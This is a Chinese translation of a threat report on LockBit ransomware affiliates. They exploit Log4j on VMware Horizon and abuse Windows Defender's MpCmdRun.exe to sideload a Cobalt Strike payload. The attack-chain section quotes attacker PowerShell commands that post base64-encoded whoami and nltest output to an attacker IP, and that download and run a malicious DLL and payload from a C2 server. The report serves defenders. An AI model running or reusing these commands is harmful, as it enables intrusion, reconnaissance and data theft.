声明
出品|知道创宇(ID:404实验室)

以下内容,来自知道创宇404实验室翻译组作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

前文

最近,LockBit受到了相当多的关注。上周,SentinelLabs报道了LockBit 3.0(又名LockBit Black),描述了这种日益流行的RaaS的最新迭代如何实现一系列反分析和反调试例程。我们的研究很快被其他报告类似发现的人跟进。

与此同时,早在4月份,SentinelLabs就报告了一家LockBit附属公司如何利用合法的VMware命令行工具VMwareXferlogs.exe来进行侧向加载Cobalt Strike。

在这篇文章中,我们将通过描述LockBit运营商或附属公司使用的另一种合法工具来追踪该事件,只是这次的问题工具属于安全工具:Windows Defender。在最近的调查中,我们发现黑客滥用Windows防御程序的命令行工具MpCmdRun.exe来解密和加载Cobalt Strike的有效载荷。

概述

最初的目标泄露是通过针对未修补的VMWare Horizon服务器的Log4j漏洞发生的。攻击者使用此处记录的PowerShell代码修改了安装web shell的应用程序的Blast Secure Gateway组件。

一旦获得初始访问权限,黑客就执行一系列枚举命令,并试图运行多种开发后工具,包括Meterpreter、PowerShell Empire和一种侧载Cobalt Strike的新方法。

特别是在尝试执行Cobalt Strike时,我们观察到一个新的合法工具用于侧加载恶意DLL,它可以解密负载。

以前观察到的通过删除EDR/EPP的用户地挂钩、Windows事件跟踪和反恶意软件扫描接口来规避防御的技术也被观察到。

攻击链

一旦攻击者通过Log4j漏洞获得初始访问权限,侦察就开始使用PowerShell执行命令,并通过对IP的POST base64编码请求过滤命令输出。侦察活动示例如下:

powershell -c curl -uri http://139.180.184[.]147:80
met POST -Body ([System.Convert]
::ToBase64String
(([System.Text.Encoding]
::ASCII.GetBytes((whoami)))))
owershell -c curl -uri http://139.180.184[.]147:80 -
met POST -Body
([System.Convert]
::ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((nltest /domain_trusts)))
))

一旦攻击者获得足够的权限,他们就会尝试下载并执行多个攻击后有效载荷。

攻击者从其控制的C2下载恶意DLL、加密负载和合法工具:

powershell -c Invoke-WebRequest -uri
http://45.32.108[.]
54:443/mpclient.dll -OutFile
c:\windows\help\windows\mpclient.dll;
Invoke-WebRequest -uri
http://45.32.108[.]54:443/c0000015.log -OutFile
c:\windows\help\windows\c0000015.log;
Invoke-WebRequest -uri
http://45.32.108[.]54:443/MpCmdRun.exe -OutFile
c:\windows\help\windows\MpCmdRun.exe;
c:\windows\help\windows\MpCmdRun.exe

值得注意的是,攻击者利用合法的Windows Defender命令行工具MpCmdRun.exe来解密和加载Cobalt Strike有效载荷。

我们还注意到用于下载Cobalt Strike有效载荷的IP地址和用于执行侦察的IP地址之间的相关性:在下载Cobalt Strike后不久,攻击者试图执行并将输出发送到以139开头的IP,如下面两个片段所示。

powershell -c Invoke-WebRequest -uri
http://45.32.108[.]54:443/glib-2.0.dll -OutFile
c:\users\public\glib-2.0.dll;
Invoke-WebRequest -uri
http://45.32.108[.]54:443/c0000013.log -OutFile
c:\users\public\c0000013.log;
Invoke-WebRequest -uri
http://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile
c:\users\public\VMwareXferlogs.exe;
c:\users\public\VMwareXferlogs.exepowershell -c curl -uri
http://139.180.184[.]147:80
-met POST -Body ([System.Convert]::
ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((
c:\users\public\VMwareXferlogs.exe)))
))

与之前报告的 VMwareXferlogs.exe工具的侧加载相同的流程,MpCmd.exe被滥用来侧加载一个武器化的mpclient.dll,它从c0000015.log文件加载并解密Cobalt Strike信标。

因此,在攻击中使用的与使用Windows Defender命令行工具相关的组件有:

总结

防御者需要警惕的是,LockBit勒索软件运营商和附属公司正在探索和利用新颖的离地攻击工具,以帮助他们加载Cobalt Strike信标和规避一些常见的EDR和传统的AV检测工具。

更重要的是,那些安全软件进行例外处理的工具,应接受仔细检查。像VMware和Windows Defender这样的产品在企业中非常普遍,如果被允许在安装的安全控制之外运行,它们对参与者的威胁会很大。

IoC

欢迎关注长白山攻防实验室公众号
定期更新优质文章分享。

依靠Windows Defender|LockBit勒索软件通过Microsoft安全工具侧面加载Cobalt Strike相关推荐

  1. 德国跨国汽车巨头大陆集团遭LockBit勒索软件组织攻击

    据BleepingCompuer11月3日消息,知名勒索软件组织LockBit宣布他们对德国跨国汽车集团大陆集团( Continental) 发动了网络攻击. LockBit声称,他们窃取了大陆集团系 ...

  2. 成功解决最新版腾讯QQ软件出现的二维码加载失败,请点击刷新(一步搞定!)

    成功解决最新版腾讯QQ软件出现的二维码加载失败,请点击刷新(一步搞定!) 目录 解决问题 解决思路 解决方法 解决问题 最新版腾讯QQ软件出现的二维码加载失败,请点击刷新 解决思路 二维码灰色,无法扫 ...

  3. windows重建图标缓存(解决快捷方式图标丢失,图标加载时间长问题)

    windows重建图标缓存(解决快捷方式图标丢失,图标加载时间长问题) 参考文章: (1)windows重建图标缓存(解决快捷方式图标丢失,图标加载时间长问题) (2)https://www.cnbl ...

  4. CANoe软件使用(二)——数据加载分析

    CANoe软件使用(二)--数据加载分析 目录 新建CANoe工程 DBC和通道加载 数据分析 离线设置 数据查看 数据保存 目录 本节主要讲述下离线的CAN数据分析.通常情况下,工程师通过CANoe ...

  5. 服务器文件夹和电脑文件夹同步软件哪个好,windows文件同步备份软件-文件夹同步工具哪个好?...

    曾有个客户致电询问自己一些重要的数据保存至D盘文件夹内,但是这些文件经常会改动,每次都是的手动复制粘贴至移动硬盘备份保存,有没有什么工具可以实现一键同步备份?今天就给大家介绍windows文件同步备份 ...

  6. windows文件同步备份软件-文件夹同步工具哪个好?

    曾有个客户致电询问自己一些重要的数据保存至D盘文件夹内,但是这些文件经常会改动,每次都是的手动复制粘贴至移动硬盘备份保存,有没有什么工具可以实现一键同步备份?今天就给大家介绍windows文件同步备份 ...

  7. 别再回来了!GandCrab勒索软件最终版本解密工具降世

    6月17日,对于最丰富的勒索家族GandCrab的最新版本的新解密工具已经免费发布在www.nomoreransom.org (一个收集最全的勒索软件解密工具的网站) https://www.nomo ...

  8. word/excel/ppt软件中删除一堆多余的加载项

    以excel为例. 第一步,先试试管理员身份运行软件,然后在"选项"-"转到COM加载项"中删除它就行了. 第二步,还不行的话(我的就是,删完过段时间发现它又在 ...

  9. 解决:微软应用商店(Microsoft Store)无法加载页面

    Win10 微软应用商店(Microsoft Store)显示无法加载页面,请稍后重试.错误代码:0x80131500 实测解决办法: 1.启动运行(快捷键:Win+R),输入:inetcpl.cpl ...

最新文章

  1. 精选实践 | 爱奇艺实用数据库选型树:不同场景如何快速选择数据库?
  2. 【转载】老鸟程序员总结的这些小技巧
  3. SQL Server基础之存储过程
  4. 一个docker镜像中的目录删除不了问题
  5. PAT甲级1122 Hamiltonian Cycle:[C++题解] 图论、模拟
  6. Android 手机卫士--9patch图
  7. k8s资源清单:常用字段说明及pod增删查示例
  8. Linux 终端操作之简明疾速指南(1)
  9. Python入门教学之(转义字符与原字符)
  10. (dfs)迷宫最小步数
  11. python去掉数字列表中括号_如何从列表中的元素中移除括号(Python)
  12. 上海财经应用统计考python_20上财应用统计415分经验帖(初试第一)
  13. ODL框架项目搭建小试牛刀-demo篇
  14. oracle stdevp函数,SQL Server和Oracle的常用函数对比
  15. Android系统各个版本系统特性整理(1.1-6.0)
  16. 精品基于Uniapp+SSM实现的作业管理app
  17. pos 机 gd32f103 midi设备
  18. 如何设计一个API快速开发平台?
  19. 产品设计和交互设计总结
  20. python + opencv微博图片去水印

热门文章

  1. 视频创意营销或将成为又一盈利法宝
  2. python读写文件,CSV和Excel
  3. 华为OD机试题 - 单核CPU任务调度、任务调度本(JavaScript)| 含思路
  4. ZZNUOJ_C语言1015 : 二次方程的实根(完整代码)
  5. mongo-admin基于Web的Mongodb数据库管理系统
  6. urllib学习记录
  7. 用拍照代替“手撕面单”,智能设备正在武装校园菜鸟驿站
  8. 驾照还没考的朋友有福了!应该是最全的了……
  9. request对象和response对象
  10. LeetCode 27.移除元素